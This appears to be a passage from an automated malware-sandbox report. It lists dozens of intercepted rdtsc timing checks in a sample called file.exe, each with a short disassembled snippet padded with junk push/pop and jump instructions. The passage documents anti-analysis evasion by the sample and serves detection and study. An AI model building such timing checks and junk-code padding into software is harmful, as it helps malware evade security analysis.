                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1DE second address: 2AF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF2F9 second address: 2AF321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jp 00007F84B0D655FCh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F84B0D655F6h 0x00000015 jmp 00007F84B0D655FBh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF5E3 second address: 2AF60C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F84B0B050DFh 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF60C second address: 2AF612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF612 second address: 2AF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF616 second address: 2AF62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF62C second address: 2AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF630 second address: 2AF648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AFA39 second address: 2AFA72 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E9h 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F84B0B050DFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AFB9F second address: 2AFBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0316 second address: 2B031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B031A second address: 2B0320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A25 second address: 2B0A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0B050D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A2F second address: 2B0A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A39 second address: 2B0A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F84B0B050E9h 0x0000000c popad 0x0000000d jmp 00007F84B0B050E9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F84B0B050E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A7F second address: 2B0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A85 second address: 2B0A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A89 second address: 2B0A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0A8F second address: 2B0A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DD8 second address: 2B7DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DDE second address: 2B7DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7DE2 second address: 2B7E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65602h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7978 second address: 2B7985 instructions: 0x00000000 rdtsc 0x00000002 js 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7985 second address: 2B798D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7AF8 second address: 2B7AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7AFE second address: 2B7B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F84B0D655F8h 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7B0B second address: 2B7B10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B9488 second address: 2B948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5401 second address: 2C540F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C540F second address: 2C5415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 201AC7 second address: 201ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6C23 second address: 2C6C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6C27 second address: 2C6C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC766 second address: 2CC76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC76C second address: 2CC778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F84B0B050D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CC371 second address: 2CC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B17 second address: 2D8B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B1B second address: 2D8B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65603h 0x0000000c jmp 00007F84B0D655FFh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F84B0D655F6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D8B4D second address: 2D8B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jnp 00007F84B0B050D6h 0x00000010 pop edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1059 second address: 2E1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F84B0D655F6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11C8 second address: 2E11DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84B0B050D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F84B0B050D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E1326 second address: 2E1365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65604h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edi 0x0000000c jmp 00007F84B0D65604h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0D655FEh 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15E0 second address: 2E15EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F84B0B050D6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15EF second address: 2E15F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E15F5 second address: 2E1600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20C9 second address: 2E20D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F84B0D655F6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20D4 second address: 2E20F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jg 00007F84B0B050D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F84B0B050DDh 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E20F7 second address: 2E20FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E7E60 second address: 2E7E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F84B0B050E4h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F7172 second address: 2F7192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F84B0D65603h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F7192 second address: 2F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007F84B0B050DCh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307990 second address: 30799A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30781B second address: 307820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307820 second address: 307837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FCh 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30989F second address: 3098AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 324B99 second address: 324B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 324B9D second address: 324BA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CCD second address: 328CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CD2 second address: 328CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328F63 second address: 328F68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A449 second address: 32A44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A44D second address: 32A465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A465 second address: 32A46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A46C second address: 32A492 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D6560Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F84B0D655F6h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A492 second address: 32A4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E4h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A4BA second address: 32A4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BCF8 second address: 32BD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BD0E second address: 32BD18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DB68 second address: 32DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DB78 second address: 32DB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jl 00007F84B0D655F6h 0x0000000e jg 00007F84B0D655F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D001B second address: 53D0044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050E5h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0044 second address: 53D0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0049 second address: 53D004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D004F second address: 53D0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EF5 second address: 53B0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F04 second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0D655FFh 0x00000009 jmp 00007F84B0D65603h 0x0000000e popfd 0x0000000f mov esi, 454F2EBFh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F84B0D65606h 0x00000023 pop ecx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E56 second address: 53F0E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E5C second address: 53F0E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E60 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F84B0B050E2h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E85 second address: 53F0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E89 second address: 53F0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390137 second address: 53901B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, 79077BEDh 0x00000017 mov ah, E9h 0x00000019 popad 0x0000001a push dword ptr [ebp+04h] 0x0000001d jmp 00007F84B0D65605h 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F84B0D65603h 0x0000002e or ax, 0C7Eh 0x00000033 jmp 00007F84B0D65609h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901B9 second address: 53901BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901BE second address: 53901D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0B99 second address: 53B0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0B9F second address: 53B0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0BA3 second address: 53B0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F84B0B050E3h 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E8h 0x0000001f sub cx, 8568h 0x00000024 jmp 00007F84B0B050DBh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F84B0B050E6h 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F84B0B050E7h 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0C2D second address: 53B0C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F84B0D65605h 0x0000000b sub ah, FFFFFF96h 0x0000000e jmp 00007F84B0D65601h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F84B0D655FAh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0671 second address: 53B06D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 42CEF6D0h 0x00000008 mov bh, AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 push edx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F84B0B050E1h 0x0000001d xor ch, 00000006h 0x00000020 jmp 00007F84B0B050E1h 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F84B0B050DEh 0x0000002d sbb ah, FFFFFFA8h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 mov ah, 8Fh 0x00000038 popad 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B06D9 second address: 53B06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0393 second address: 53B03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0B050DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F84B0B050DCh 0x00000017 jmp 00007F84B0B050E5h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F84B0B050DDh 0x00000026 rdtsc
